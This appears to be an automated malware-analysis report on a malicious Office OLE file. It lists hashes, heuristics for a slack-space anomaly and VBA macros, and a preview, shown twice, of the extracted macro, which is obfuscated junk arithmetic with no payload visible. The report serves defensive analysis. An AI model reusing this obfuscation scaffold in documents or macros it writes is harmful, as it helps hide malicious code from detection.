Office (OLE) malware analysis — malicious · 4e4f6462d3f172ea

MALICIOUS

Office (OLE)

105.9 KB First seen: 2019-08-04

MD5: 9c0aed5848e3df57273094cc8acd7140 SHA-1: 902e78d485c91bf6bac146f346f83fbcfdf3abf5 SHA-256: 4e4f6462d3f172eac70c0b73faf094edaaf75a76debd41dc1c7aa2046e908da6

62 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic

The presence of VBA macros and the OLE slack space anomaly indicate a malicious document. The obfuscated VBA code strongly suggests it is designed to download and execute a second-stage payload, though the specific URL or execution method is not directly discernible due to the obfuscation. The embedded URL is benign.

Heuristics 3

OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY

OLE file is 108,444 bytes but its declared streams total only 57,435 bytes — 51,009 bytes (47%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
VBA macros detected medium OLE_VBA_MACROS

Document contains VBA macro code
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4940 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	4940 bytes
SHA-256: `07168c26c8e8e140d1240af4c9c8178f5a9104551f73d5023b368425191583c4`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "KfVvvOMj" Private Function zRFtwLHaz() On Error Resume Next wtIzFM = 64115 + vSErW * cnOJva + 91536 / MwsYi - wAhHv / 57645 * 95603 * 62440 / dUrjvz ckYuu = zazTjF / cXDWM / 16403 * AjbwP + 34005 / NRPYw + (FwmKBL / zLPiKj - wPZoj - rOwIc / dElJhu - YzfktV) OLYQui = 36714 + wrYhJE * hjWvlw + 92015 / uvHlpE - zbhPdN / 12313 * 69472 * 3369 / OOzmY BJnoCa = 79074 + zrKSLl * GvsitJ + 94278 / Qwana - DQOtw / 74806 * 12157 * 64951 / sitcp YnKCZ = 4343 + mTSiUm * dpErwA + 89175 / TawUZX - wGVwmN / 4030 * 87694 * 78594 / ZmdKvc End Function Private Function oQsmjwawrbp() On Error Resume Next iAozL = cFVTGw / jJsLrU / 50914 * QsCGU + 89854 / OXvsor + (YcWDOv / oDdfnl - Uajzt - NHlqqi / qwYOIF - kQooFi) VTpFIw = CAprtv / oPjXkt / 44286 * aHpbZJ + 53963 / oKXAl + (iMCwtH / vCaAo - EUlCD - YthPj / RaoAh - uEqkW) GovMhq = FJhWkh / cDDFqS / 21808 * iisPf + 5322 / wRmpNi + (FjBifO / MKCJWE - vQzzT - GRUSKu / KPkuT - fwTEIn) oYbhIa = wOsush / qjMjM / 11110 * fPWhAi + 8059 / stOflT + (PJZIw / JVNND - aHbZS - mJJEz / rpKWz - MwzdQC) qAihWi = LChoYK / RifSi / 9195 * ajPqw + 62365 / nSFEGi + (fGLwS / PmiENV - ITLIHZ - QUOrY / JXjck - cMlYT) InVuJ = zPiiQ / wRwJD / 20921 * RRHrn + 41846 / AGVwqZ + (PFznP / fKcLfG - jvznaG - pmBviY / Tquhnq - hLzWn) End Function Private Function iUIDnztcLkzAH() On Error Resume Next rtzdfD = 68366 + SomMn * CVhpKG + 16871 / mFXrk - WKKXN / 15933 * 7689 * 40797 / DMkvE QwmqCB = 65811 + MUKiW * lZPbA + 76711 / bWljON - jXlLqM / 66094 * 51272 * 77102 / VEvIi nTAKAV = 98468 + RDWDl * ifWziY + 37209 / zzZaG - GdQuh / 98853 * 93745 * 38543 / qSLnH AlGlI = 28529 + LzBip * sFnSi + 87876 / iPwfm - GidZLE / 22959 * 45246 * 9493 / lzwHtz dONWz = 46933 + QKhkl * awaImi + 44877 / adknSB - hmOfo / 75178 * 3210 * 46165 / kjEHv End Function Private Function PiiEPbkAXsDITl() On Error Resume Next pjolwC = imYUw / chjOE / 55865 * mJaIzY + 39948 / zkToK + (HhtYfc / SPXXkN - lMRMFs - jJjlZ / pjBEfl - UzqpYA) tCkOL = jlSHj / UbYNn / 12362 * zmNSrw + 44157 / lWcnEt + (mGvWOJ / vjzwT - tadCS - Bjfkt / owzOq - fYjoS) zzWWb = auVEFj / TwQOD / 9 * OcAFpR + 5452 / zYCJrm + (ZwRXiH / jKVAjE - muQlXp - wRhJd / zzBvsh - YSwfRi) slqri = vfAhL / ZVwsHH / 43280 * GZMJj + 84973 / RvpFIL + (aUKoBP / lnPlVR - jjYhvQ - SZhLm / ijLcCh - vdhSGH) End Function Private Function dTmAsLVWqbUd(mcChsEmnHArif) On Error Resume Next TKKnWw = (59171 + QKzZin / USbDPZ + hitAQO / 39566 / QjFbUV) / 32698 + fNiMC + GQEZLO * 72834 KbhkP = (32176 + NubHv / dOYTBb + jodCCw / 11616 / oMofbK) / 2802 + JtTuD + nMniEp * 83629 Lmdbt = (40576 + QNXuNT / SGDww + kNizcd / 93603 / DGICvl) / 30032 + rpcKfO + fpswwG * 8778 wiwHj = (99108 + YpMGO / ShrkPN + mJWOw / 14500 / jzkwvS) / 72309 + DRaLpL + qBrQwa * 28806 End Function Private Function iaFwDGZsLNOEiR() On Error Resume Next YpMNO = (1686 + lYpPNw / QiczmS + GJncmL / 73443 / honzKL) / 3570 + qjXrnv + dTEvco * 81958 QURfY = (70134 + oKurAb / ohOmm + PbCLV / 18225 / iQJBq) / 54273 + jpuWW + HijtD * 76511 YzQTM = (23861 + qGAjWm / GhmLR + bzJIXt / 67720 / AaDZQ) / 45805 + SBdWRA + zJPoZ * 98077 SOfRq = (39540 + tklWzi / vHiFTH + FBDajT / 83472 / zRQRw) / 67269 + bDFKzL + SjaJQ * 35149 WEAcwZ = (78771 + vTdHq / zKGOan + JpAfNA / 99631 / iUkrHD) / 97315 + nYTdt + DosXTL * 9203 End Function Private Function lTjmvuXZitj() On Error Resume Next RoWwZ = (66523 + WIRtiB / aLVjvV + WiWNb / 91120 / ZllCH) / 45005 + WFzOU + SrvKP * 41530 jnCjN = (5741 + GzlwnM / WjqXid + GYSaA / 7125 / mMzFdB) / 80773 + jStUWP + LPhIV * 39061 RhAhNV = (65497 + PsZwFY / zrDWZ + wiWvZ / 6364 / utjCA) / 59897 + Wqijb + iFlnk * 94070 EpisTC = (16921 + GZpCA / LkQMj + biHkca / 56201 / ThDqL) / 93369 + mYUdMj + fuqju * 50689 rsqDm = (53177 + wdloS / zWLWv + HwIMUv / 40169 / qziKcw) / 77368 + ApzND + XNsvJj * 60723 End Function Private Function zVfoMjIYQjYFO() On Error Resume Next pwLwV = (54399 + AjHfrP / XAYXTO + ikwunA / 93228 / QNYCou) / 10658 + BHwcZr + UlpitI * 81499 jQ ... (truncated)

SHA-256: 07168c26c8e8e140d1240af4c9c8178f5a9104551f73d5023b368425191583c4

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "KfVvvOMj"
Private Function zRFtwLHaz()
On Error Resume Next
   wtIzFM = 64115 + vSErW * cnOJva + 91536 / MwsYi - wAhHv / 57645 * 95603 * 62440 / dUrjvz
   ckYuu = zazTjF / cXDWM / 16403 * AjbwP + 34005 / NRPYw + (FwmKBL / zLPiKj - wPZoj - rOwIc / dElJhu - YzfktV)
   OLYQui = 36714 + wrYhJE * hjWvlw + 92015 / uvHlpE - zbhPdN / 12313 * 69472 * 3369 / OOzmY
   BJnoCa = 79074 + zrKSLl * GvsitJ + 94278 / Qwana - DQOtw / 74806 * 12157 * 64951 / sitcp
   YnKCZ = 4343 + mTSiUm * dpErwA + 89175 / TawUZX - wGVwmN / 4030 * 87694 * 78594 / ZmdKvc
End Function
Private Function oQsmjwawrbp()
On Error Resume Next
   iAozL = cFVTGw / jJsLrU / 50914 * QsCGU + 89854 / OXvsor + (YcWDOv / oDdfnl - Uajzt - NHlqqi / qwYOIF - kQooFi)
   VTpFIw = CAprtv / oPjXkt / 44286 * aHpbZJ + 53963 / oKXAl + (iMCwtH / vCaAo - EUlCD - YthPj / RaoAh - uEqkW)
   GovMhq = FJhWkh / cDDFqS / 21808 * iisPf + 5322 / wRmpNi + (FjBifO / MKCJWE - vQzzT - GRUSKu / KPkuT - fwTEIn)
   oYbhIa = wOsush / qjMjM / 11110 * fPWhAi + 8059 / stOflT + (PJZIw / JVNND - aHbZS - mJJEz / rpKWz - MwzdQC)
   qAihWi = LChoYK / RifSi / 9195 * ajPqw + 62365 / nSFEGi + (fGLwS / PmiENV - ITLIHZ - QUOrY / JXjck - cMlYT)
   InVuJ = zPiiQ / wRwJD / 20921 * RRHrn + 41846 / AGVwqZ + (PFznP / fKcLfG - jvznaG - pmBviY / Tquhnq - hLzWn)
End Function
Private Function iUIDnztcLkzAH()
On Error Resume Next
   rtzdfD = 68366 + SomMn * CVhpKG + 16871 / mFXrk - WKKXN / 15933 * 7689 * 40797 / DMkvE
   QwmqCB = 65811 + MUKiW * lZPbA + 76711 / bWljON - jXlLqM / 66094 * 51272 * 77102 / VEvIi
   nTAKAV = 98468 + RDWDl * ifWziY + 37209 / zzZaG - GdQuh / 98853 * 93745 * 38543 / qSLnH
   AlGlI = 28529 + LzBip * sFnSi + 87876 / iPwfm - GidZLE / 22959 * 45246 * 9493 / lzwHtz
   dONWz = 46933 + QKhkl * awaImi + 44877 / adknSB - hmOfo / 75178 * 3210 * 46165 / kjEHv
End Function
Private Function PiiEPbkAXsDITl()
On Error Resume Next
   pjolwC = imYUw / chjOE / 55865 * mJaIzY + 39948 / zkToK + (HhtYfc / SPXXkN - lMRMFs - jJjlZ / pjBEfl - UzqpYA)
   tCkOL = jlSHj / UbYNn / 12362 * zmNSrw + 44157 / lWcnEt + (mGvWOJ / vjzwT - tadCS - Bjfkt / owzOq - fYjoS)
   zzWWb = auVEFj / TwQOD / 9 * OcAFpR + 5452 / zYCJrm + (ZwRXiH / jKVAjE - muQlXp - wRhJd / zzBvsh - YSwfRi)
   slqri = vfAhL / ZVwsHH / 43280 * GZMJj + 84973 / RvpFIL + (aUKoBP / lnPlVR - jjYhvQ - SZhLm / ijLcCh - vdhSGH)
End Function
Private Function dTmAsLVWqbUd(mcChsEmnHArif)
On Error Resume Next
   TKKnWw = (59171 + QKzZin / USbDPZ + hitAQO / 39566 / QjFbUV) / 32698 + fNiMC + GQEZLO * 72834
   KbhkP = (32176 + NubHv / dOYTBb + jodCCw / 11616 / oMofbK) / 2802 + JtTuD + nMniEp * 83629
   Lmdbt = (40576 + QNXuNT / SGDww + kNizcd / 93603 / DGICvl) / 30032 + rpcKfO + fpswwG * 8778
   wiwHj = (99108 + YpMGO / ShrkPN + mJWOw / 14500 / jzkwvS) / 72309 + DRaLpL + qBrQwa * 28806
End Function
Private Function iaFwDGZsLNOEiR()
On Error Resume Next
   YpMNO = (1686 + lYpPNw / QiczmS + GJncmL / 73443 / honzKL) / 3570 + qjXrnv + dTEvco * 81958
   QURfY = (70134 + oKurAb / ohOmm + PbCLV / 18225 / iQJBq) / 54273 + jpuWW + HijtD * 76511
   YzQTM = (23861 + qGAjWm / GhmLR + bzJIXt / 67720 / AaDZQ) / 45805 + SBdWRA + zJPoZ * 98077
   SOfRq = (39540 + tklWzi / vHiFTH + FBDajT / 83472 / zRQRw) / 67269 + bDFKzL + SjaJQ * 35149
   WEAcwZ = (78771 + vTdHq / zKGOan + JpAfNA / 99631 / iUkrHD) / 97315 + nYTdt + DosXTL * 9203
End Function
Private Function lTjmvuXZitj()
On Error Resume Next
   RoWwZ = (66523 + WIRtiB / aLVjvV + WiWNb / 91120 / ZllCH) / 45005 + WFzOU + SrvKP * 41530
   jnCjN = (5741 + GzlwnM / WjqXid + GYSaA / 7125 / mMzFdB) / 80773 + jStUWP + LPhIV * 39061
   RhAhNV = (65497 + PsZwFY / zrDWZ + wiWvZ / 6364 / utjCA) / 59897 + Wqijb + iFlnk * 94070
   EpisTC = (16921 + GZpCA / LkQMj + biHkca / 56201 / ThDqL) / 93369 + mYUdMj + fuqju * 50689
   rsqDm = (53177 + wdloS / zWLWv + HwIMUv / 40169 / qziKcw) / 77368 + ApzND + XNsvJj * 60723
End Function
Private Function zVfoMjIYQjYFO()
On Error Resume Next
   pwLwV = (54399 + AjHfrP / XAYXTO + ikwunA / 93228 / QNYCou) / 10658 + BHwcZr + UlpitI * 81499
   jQ
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.